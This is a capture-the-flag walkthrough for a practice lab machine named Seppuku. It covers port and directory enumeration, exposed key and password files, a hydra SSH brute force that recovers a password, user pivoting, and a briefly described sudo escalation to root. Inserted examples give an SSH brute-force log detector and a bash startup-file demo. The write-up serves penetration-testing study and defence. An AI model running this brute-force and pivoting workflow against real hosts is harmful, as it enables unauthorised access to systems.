OSCP-PG-Seppuku

Mkd1R 2022-5-25

#Enumeration

-nmap

# nmap -sS -Pn -n --open -T4 -p- 192.168.240.90
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
7080/tcp open  empowerid
7601/tcp open  unknown
8088/tcp open  radan-http

-nmap2

# nmap -p 21,22,80,139,445,7080,7601,8088 -A 192.168.240.90
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http        nginx 1.14.2
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_ssl-date: TLS randomness does not represent time
|_http-title:  404 Not Found
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_http-server-header: LiteSpeed
7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-title: Seppuku
|_http-server-header: Apache/2.4.38 (Debian)
8088/tcp open  http        LiteSpeed httpd
|_http-title: Seppuku
|_http-server-header: LiteSpeed
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.18 (91%), Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%), Linux 3.10 - 3.12 (90%), Linux 3.4 (90%), Linux 3.5 (90%), Linux 3.7 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m37s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-24T12:36:48
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2022-05-24T08:36:49-04:00

#Web enumeration

-Gobuster

# gobuster dir -u http://192.168.240.90:7601/ -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt
===============================================================
/a                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/a/]
/b                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/b/]
/c                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/c/]
/ckeditor             (Status: 301) [Size: 326] [--> http://192.168.240.90:7601/ckeditor/]
/d                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/d/]       
/database             (Status: 301) [Size: 326] [--> http://192.168.240.90:7601/database/]
/e                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/e/]       
/f                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/f/]       
/h                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/h/]       
/index.html           (Status: 200) [Size: 171]                                           
/keys                 (Status: 301) [Size: 322] [--> http://192.168.240.90:7601/keys/]    
/production           (Status: 301) [Size: 328] [--> http://192.168.240.90:7601/production/]
/q                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/q/]         
/r                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/r/]         
/secret               (Status: 301) [Size: 324] [--> http://192.168.240.90:7601/secret/]    
/server-status        (Status: 403) [Size: 281]                                             
/stg                  (Status: 301) [Size: 321] [--> http://192.168.240.90:7601/stg/]       
/t                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/t/]         
/w                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/w/] 

-Gobuster2

# gobuster dir -u http://192.168.240.90:8088/ -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt
===============================================================
/blocked              (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/blocked/]
/cgi-bin              (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/cgi-bin/]
/docs                 (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/docs/]   
/error404.html        (Status: 500) [Size: 1240]                                          
/index.php            (Status: 200) [Size: 163188]                                        
/index.html           (Status: 200) [Size: 171]

-Gobuster3

# gobuster dir -u http://192.168.240.90:8088/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,json -o gbig2.txt
===============================================================
/cgi-bin              (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/cgi-bin/]
/docs                 (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/docs/]   
/index.php            (Status: 200) [Size: 163188]                                        
/index.html           (Status: 200) [Size: 171]                                           
/blocked              (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/blocked/]

An SSH private key file was found at http://192.168.240.90:7601/keys/, together with a few other sensitive files: hostname, passwd.back, password.lst and shadow.bak.

#Exploitation

I used the contents of hostname and password.lst to brute-force the host's SSH service with hydra, and it succeeded.

# hydra -l seppuku -P pass.txt 192.168.240.90 ssh -t 10
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-24 21:00:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 93 login tries (l:1/p:93), ~10 tries per task
[DATA] attacking ssh://192.168.240.90:22/
[STATUS] 72.00 tries/min, 72 tries in 00:01h, 21 to do in 00:01h, 10 active
[22][ssh] host: 192.168.240.90   login: seppuku   password: eeyoree
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-05-24 21:01:57

With this I had a low-privilege shell:

# sshpass -p eeyoree ssh seppuku@192.168.240.90
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
seppuku@seppuku:~$ whoami
seppuku
seppuku@seppuku:~$
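
From the defender's side, a burst like the hydra run above leaves an unmistakable trail in sshd's auth log. The following is an added example, not part of the original write-up: it feeds constructed syslog-style sshd lines (addresses from the 192.0.2.0/24 documentation range, made-up PIDs) through a small awk detector that flags a source the moment it reaches a per-minute failure threshold, and any later successful login from that source.

```shell
#!/bin/sh
# Added example, not from the original write-up: the hydra burst above as it
# appears to the defender, plus a minimal detector. All log lines are constructed.

# Constructed sshd lines: a burst of failures from one address ending in a
# success, plus ordinary activity from a second host.
sample_auth_log() {
    printf '%s\n' \
      'May 24 21:00:52 seppuku sshd[1201]: Failed password for seppuku from 192.0.2.10 port 40110 ssh2' \
      'May 24 21:00:52 seppuku sshd[1203]: Failed password for seppuku from 192.0.2.10 port 40112 ssh2' \
      'May 24 21:00:53 seppuku sshd[1205]: Failed password for seppuku from 192.0.2.10 port 40114 ssh2' \
      'May 24 21:00:53 seppuku sshd[1207]: Failed password for invalid user admin from 192.0.2.20 port 51000 ssh2' \
      'May 24 21:00:54 seppuku sshd[1209]: Failed password for seppuku from 192.0.2.10 port 40116 ssh2' \
      'May 24 21:00:55 seppuku sshd[1211]: Failed password for seppuku from 192.0.2.10 port 40118 ssh2' \
      'May 24 21:01:10 seppuku sshd[1213]: Accepted publickey for tanto from 192.0.2.20 port 51002 ssh2' \
      'May 24 21:01:57 seppuku sshd[1215]: Accepted password for seppuku from 192.0.2.10 port 40200 ssh2'
}

# Reads sshd lines on stdin. Flags a source address the first time it reaches
# $1 failed logins within one minute, and every later successful login from a
# flagged address (the "guessed it" moment at the end of a brute force).
ssh_bruteforce_report() {
    awk -v thr="$1" '
        # token after "from" is the peer address; token after "for" is the
        # account, skipping the "invalid user" prefix sshd adds for unknown ones
        function src(  i) { for (i = 1; i <= NF; i++) if ($i == "from") return $(i + 1); return "?" }
        function usr(  i) {
            for (i = 1; i <= NF; i++)
                if ($i == "for") {
                    if ($(i + 1) == "invalid") return $(i + 3)
                    return $(i + 1)
                }
            return "?"
        }
        /sshd\[[0-9]+\]: Failed password for/ {
            ip = src(); minute = $1 " " $2 " " substr($3, 1, 5)
            n = ++per_minute[ip SUBSEP minute]
            if (n >= thr && !(ip in flagged)) {   # report each source once
                flagged[ip] = 1
                print "BRUTEFORCE " ip " " minute " failures=" n
            }
        }
        /sshd\[[0-9]+\]: Accepted (password|publickey) for/ {
            ip = src()
            if (ip in flagged) print "SUCCESS_AFTER_BRUTEFORCE " ip " user=" usr()
        }'
}

sample_auth_log | ssh_bruteforce_report 5
```

At hydra's observed rate of about 72 tries per minute, a threshold of 5 failures per minute per source fires within the first few seconds while leaving a user who mistypes a password twice alone.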

#Changing user

Next I found a .passwd file in the current user's home directory and tried to switch user with its contents.
That worked and I became samurai. With sudo -l I checked what this user is allowed to run, but I had no permission to work inside tanto's directory, so we still had to switch to the tanto user; we also had the id_rsa found at the start, which had not been used yet.
Luckily, that login succeeded.

Tips:
When bash is invoked as an interactive login shell, or as a non-interactive shell with the --login option, it first reads /etc/profile and then looks for ~/.bash_profile, ~/.bash_login and ~/.profile in that order, executing the first one that exists:
/etc/profile
~/.bash_profile
~/.bash_login
~/.profile
The --noprofile option stops bash from reading any of these four startup scripts.
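
To see that order concretely, here is an added example (not from the original write-up) that builds a throwaway HOME containing the per-user startup files and shows which one a login shell runs under each invocation. It assumes bash is installed and touches nothing outside the temporary directory.

```shell
#!/bin/sh
# Added example, not from the original write-up: which per-user startup file a
# bash login shell really runs, and that --noprofile skips them all. Everything
# happens inside a throwaway HOME, so the real account is untouched.

# $1   : space-separated names to create in the fake HOME, chosen from
#        .bash_profile .bash_login .profile
# $2...: options handed to bash (e.g. --login, --noprofile)
# Prints the names of the files that actually ran, one per line.
startup_files_run() {
    local want fake_home f
    want=$1; shift
    fake_home=$(mktemp -d) || return 1
    : > "$fake_home/ran"
    for f in $want; do
        # each candidate file does nothing but record its own name
        printf 'echo %s >> "$HOME/ran"\n' "$f" > "$fake_home/$f"
    done
    # -c makes this a non-interactive shell; it reads /etc/profile and then
    # exactly one of the three files above only when --login is present
    HOME=$fake_home bash "$@" -c 'true' >/dev/null 2>&1
    cat "$fake_home/ran"
    rm -rf "$fake_home"
}

all='.bash_profile .bash_login .profile'
echo "--login, all three present   -> $(startup_files_run "$all" --login)"
echo "--login, no .bash_profile    -> $(startup_files_run '.bash_login .profile' --login)"
echo "--login, only .profile       -> $(startup_files_run '.profile' --login)"
echo "--login --noprofile          -> $(startup_files_run "$all" --login --noprofile)"
echo "no --login (plain bash -c)   -> $(startup_files_run "$all")"
```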

#SUID

After switching to tanto, we create the file we need there and then switch back to samurai, since the samurai user has NOPASSWD execution rights through sudo.
With that, we have full root privileges.
- THE END -

Last modified: 2022-07-02